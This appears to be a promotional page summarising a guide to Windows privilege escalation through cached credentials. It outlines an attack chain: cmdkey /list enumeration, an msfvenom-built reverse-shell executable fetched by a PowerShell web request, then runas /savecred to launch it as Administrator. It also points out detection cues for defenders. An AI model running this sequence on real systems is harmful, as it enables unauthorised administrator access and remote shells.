Skip to content
Windows Privilege Escalation: Stored Credentials (Runas) Cover
Get the Book

Windows Privilege Escalation: Stored Credentials (Runas)

by Endpoint Operations Assurance

A practical evaluation of the Windows Credential Manager, explicitly detailing how attackers leverage native `cmdkey` enumeration and the `/savecred` flag to escalate execution contexts gracefully.

“Stored Credentials Exploitation is a technique attackers use to escalate their access seamlessly. The Windows Credential Manager acts as a digital vault, but if an administrator has cached their credentials, an attacker can extract that privilege linearly without ever knowing the password.”

Modern Windows operating systems are designed heavily around user convenience. To prevent users and administrators from repeatedly typing complex passwords for mapped network drives or administrative applications, Windows caches these artifacts in the Credential Manager. Windows Privilege Escalation: Stored Credentials (Runas) provides a step-by-step breakdown of how attackers locate these cached tokens and securely piggyback on them to elevate their privileges to Administrator or SYSTEM.

Enumerating the Digital Vault

The guide bypasses the graphical Control Panel interface necessary for standard users, focusing instead on pure command-line execution for the remote operator. When an attacker lands on a compromised host as a low-privileged user, the very first step in this methodology is executing the native binary cmdkey /list.

The text highlights exactly what an attacker is hunting for in the output: a cached credential explicitly linked to the Administrator account or an enterprise Domain Admin. Finding this entry confirms the system is holding a highly privileged token ready for use.

Weaponizing the Runas Binary

The core of the exploitation does not involve cracking the password hash; it relies entirely on native Windows functionality. The guide outlines how to abuse the runas.exe executable, specifically weaponizing the /savecred flag.

By chaining these concepts, the guide details an elegant attack sequence:

  1. Payload Generation: Generating a malicious executable (shell.exe) using msfvenom and transferring it to the target’s Downloads folder via a PowerShell web request.
  2. Context Switching: Executing the payload via the command: runas /savecred /user:WORKGROUP\Administrator shell.exe.
  3. Privilege Escalation: Because /savecred instructs the OS to natively pull the password directly from the Credential Manager, the OS seamlessly executes the reverse shell under the Administrator’s security context—all without the attacker ever needing to type the actual password.

Who Is This Book REALLY For?

  • Penetration Testers: A dedicated reminder to always check cmdkey /list during the initial enumeration phase. If an administrator was lazy, the path to SYSTEM takes exactly two commands.
  • System Administrators: An aggressive warning explicitly illustrating why administrators must never save their high-side credentials on low-side user workstations.
  • Endpoint Detect & Respond (EDR) Analysts: Outlining the specific behavioral chain—cmdkey enumeration immediately followed by a runas execution spawning a networking binary—that guarantees an attacker is pivoting through stored tokens.

The Bottom Line

Windows Privilege Escalation: Stored Credentials (Runas) demonstrates the extreme danger of administrative convenience. It effectively proves that caching credentials to save a few seconds sets up an elegant, native exploit path that bypasses authentication entirely.

Share article

Subscribe to my newsletter

Receive my case study and the latest articles on my WhatsApp Channel.

New Cyber Alert